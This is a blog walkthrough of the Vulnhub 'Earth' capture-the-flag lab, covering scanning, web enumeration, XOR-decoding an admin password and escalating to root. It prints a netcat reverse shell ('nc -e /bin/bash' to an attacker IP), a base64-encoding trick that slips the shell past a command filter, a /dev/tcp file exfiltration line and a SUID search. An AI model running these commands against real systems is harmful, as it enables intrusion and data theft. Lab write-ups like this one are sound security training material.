The Planets CTF | Earth CTF | Vulnhub | WriteUp | Walkthrough
Hello, friends I’m Shams Ul Mehmood and this is my 5th article. This article is a walkthrough of all about The Planet Earth Vulnhub Box. It includes some type of security flaws like Python Reverse Shell, User Privilege Escalation and Directory Listing. You can download this Vulnhub box from here.
The steps
The summary of the steps required in solving this CTF is given below:
- Getting the victim machine IP address by arp-scan utility
- Getting open port details by using the Nmap tool
- Enumerating HTTP server
- Configuring domain in the Host file
- Enumerating with Gobuster / Nikto
- Decrypting string with the help of XOR online utility
- Connecting to the target system
- Getting root account
So, as we have all the information that we need to start. Let us get started with the challenge.
Step-1:
📌️ In the first step of the scanning, I used the arp-scan commands to perform a Local Network Scan to find out the IP Address of the target machine.
Command : sudo arp-scan 192.168.204.0/24
Step-2:
📌️ In the second step, after getting the victim machine’s IP address now I performed a Nmap scan to my victim. I used,
- -sS : to scan running services.
- -sV : to scan application version.
- -p- : to scan all ports on victim machine.
- -sC : to scan default script.
- -Pn : to skip host discovery
- -O : to scan operating system
Command : sudo nmap -p- -O -sV -sC -Pn -sS 192.168.204.132
📌 ️This was an nmap scan of the network to find the IP address of the target machine. I found that the IP address was 192.168.204.132, and I found three different ports 22, 80 and 443 which were open.
📌 Running Operating System over victim machine was Linux.
📌 Now I open the target machine ip address with default port which is 80 in browser.
Command : http://192.168.204.132
Step-3:
📌 In third step, I was trying to enumerate the HTTP server. When I open the victim ip address with port 443 and https protocol in browser.
Command : https://192.168.204.132:443
📌 Then browser return Warning Message after that message then I click on advanced option and then I click on Accept the Risk and Continue button.
📌 Then I found Fedora Webserver Test Page.
Step-4:
📌 In 4th step before open the certificate, first I need to click on lock icon in search bar then click on view certificate to open the certificate in my browser.
📌 Then DNS names will assign to target machine ip address in hosts files.
Command : sudo ls /etc/hosts
Command : sudo nano /etc/hosts
📌 Then the ping the target machine ip address and domain names.
Command : ping 192.168.204.132
Command : ping earth.local -c 3
Command : ping terratest.earth.local -c 3
Step-5:
📌️ In this step, I used the different tools like dirb, gobuster and nikto to enumerate interesting hidden files and directories on this target machine.
📌 I used gobuster on victim ip address with default HTTP protocol and their port (80) and in this scan I found admin directory.
Command : sudo gobuster dir -u http://earth.local/ -w /usr/share/wordlists/dirb/big.txt
📌 But when I used gobuster on victim ip address with HTTPS protocol and their port (443) and in this scan I found robots.txt file.
Command : sudo gobuster dir -u https://terratest.earth.local/ -k -w /usr/share/wordlists/dirb/big.txt
📌 On the other side, when I used nikto on target ip address with default protocol (HTTP) and port (80).
Command : nikto -h 192.168.204.132
Command : http://192.168.204.132/2IOYbv0L.php
Command : http://192.168.204.132/icons/
Command : http://192.168.204.132/icons/README
📌 Then I was written Domain name (earth.local) in browser search bar.
📌 Then I was appended admin directory with domain name in browser search bar.
Command : http://earth.local/admin/
Command : http://earth.local/admin/login
Command : https://terratest.earth.local/index.html
Command : https://terratest.earth.local/robots.txt
Command : https://terratest.earth.local/testingnotes.txt
Command : https://terratest.earth.local/testdata.txt
Step-6:
📌 I have the username which is terra <- from testingnotes.txt
📌 I have the encrypted message from the earh.local page
📌 I have the encryption key which is testdata.txt and which can be use to decrypt the messages
📌 I know that there is admin login panel in the earth.local/admin so maybe we can find out a way to log into it when we decrypt the message.
📌 This information is crucial. Then I found out about the Cyber Chef.
📌 Then I download and unzip the Cyber Chef zip file.
📌 Then in browser, I load the CyberChef_v10.18.6.html file.
📌 After that then Import “From Hex” and “XOR” in Cyber Chef and input the XOR key same as in the testdata.txt. Put the hash message into the Input and hit BAKE!. Hence we have the password earthclimatechangebad4humans.
📌 Let’s cook! We have the potential password for terra account!
📌 Go to earth.local/admin and log in.
📌 Now we can execute the commands on the box!
Command : whoami
📌 And their output was apache.
Command : ls -al
Command : cd /home; ls -la; pwd
Command : locate ‘flag’
Command : cat /var/earth_web/user_flag.txt
Command : cat /etc/passwd
Command : echo “8.8.8.8”
📌 And 8.8.8.8 is a google public ip and here their above command output is ‘remote connections are forbidden’.
Step-7:
📌 So the most efficient method to connect to victim machine is by using netcat listener.
Command : nc -e /bin/bash 192.168.204.143 4444
📌 Where 4444 is the port number for our netcat connection. Before clicking on run command, execute this command in the terminal.
Command : nc -lvnp 4444
📌 This is how your screen should look like before clicking the Run command button.
📌 After clicked and what now? It failed becasue the remote connection is not allowed from the target machine. However, we can cheat the target machine into doing what we want. We need to encrypt the command and force it to be decrypted and run at the same time.
Command : echo ‘nc -e /bin/bash 192.168.204.143 4444’ | base64
📌 e is for encryption.
📌 Then I injected the encoded reverse shell into the web server via the input field on Admin Command Tool web page.
Command : echo ‘bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMjA0LjE0MyA0NDQ0Cg==’ | base64 -d | bash
📌 d is for decryption.
📌 bash is for forcing this command to be run as a script
Step-8:
📌 Then Click on run command, the server will freeze for a while however look at the netcat listener. We got the connection.
📌 Now we are able to run different commands.
Command : whoami
Command : pwd
Command : ls /
Command : ls /var/
Command : cd /var/earth_web/
Command : ls
Command : cat /var/earth_web/user_flag.txt
📌 To find that we need to run this command( this is super useful commnad that can help you find these vulnerabilites that can be exploited, save it!)
Command : find / -perm -u=s -type f 2>/dev/null
📌 So let’s check reset_root file, it looks interesting. First let’s check the file info and then we can try to execute the file.
Command : file /usr/bin/reset_root
📌 To run the file simply run this following command :
Command : reset_root
How to send the file over via netcat?
- Start another netcat session where we are on the target system
Command : cat /usr/bin/reset_root > /dev/tcp/192.168.204.143/3333
📌 After that then it is obvious that the file is not executable as it is now, we are encountering an error while doing it, we also can not analyze the file via netcat. We need to send the file over to our Kali machine so we can use some other tools to do it.
2. Start another netcat listener on another terminal on your Kali Machine.
Command : nc -lvnp 3333 > reset_root
Command : ls
Command : chmod +x reset_root
Command : cat reset_root
📌 Then after that, without proper tools we are still not able to deterime what is wrong and why the file can not be run on the target system. We have to install the tool called ltrace. If you don’t have it, just click y to accept and install.
📌 Now here we can easily look into the reset_root file contents.
Command : ltrace ./reset_root
📌 Underlined are 3 files that are missing to properly execute the file. So we need to create those files in our netcat connection on the target machine. Switching back to our netcat listener to create these files that are missing.
Command : touch /dev/shm/kHgTFI5G
Command : touch /dev/shm/Zw7bV9U5
Command : touch /tmp/kcM0Wewe
Command : reset_root
📌 Wow Awesome! We executed the file and now the root password is reset to “Earth”.
📌 Let’s change to root account by executing given command.
Command : su root
📌 Next let’s some other commands on victim terminal.
Command : whoami
Command : ls
Command : cd home
Command : ls
Command : cd earth
Command : ls
Command : cd /root
Command : ls
Command : cat root_flag.txt
📌 Now you need to check for the root flag.
📌 Super! you can see our desire root flag in root directory on victim machine.
CTF Game Over : I am Root!
\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀
📈⭐🧑🎤🎭💯
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠋⠁⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠈⠙⣿⣿
⣿⣿⡄⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢠⣿⣿
⣿⣿⣿⡀⠀⠀⢹⣿⣿⣿⣿⣿⠟⠉⠀⠀⠉⠻⣿⣿⣿⣿⣿⡏⠀⠀⢀⣿⣿⣿
⣿⣿⣿⣧⠀⠀⠀⢻⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡟⠀⠀⠀⣼⣿⣿⣿
⣿⣿⣿⣿⡄⠀⠀⠈⢿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡿⠁⠀⠀⢠⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠀⠀⠀⠈⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠁⠀⠀⠀⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠈⢻⡆⠀⠀⠀⠀⠀⠀⢰⡟⠁⠀⠀⠀⣼⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⢸⣿⣦⡀⠀⠀⢀⣴⣿⡇⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠈⣇⠸⣿⠒⠒⣿⠇⣸⠁⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⣿⡀⢿⡄⢠⡿⢀⣿⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠸⣧⠘⣷⣾⠃⣼⠇⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⢹⡶⠛⠛⢶⡏⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠘⣧⣀⣀⣼⠃⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣿⣿⣶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿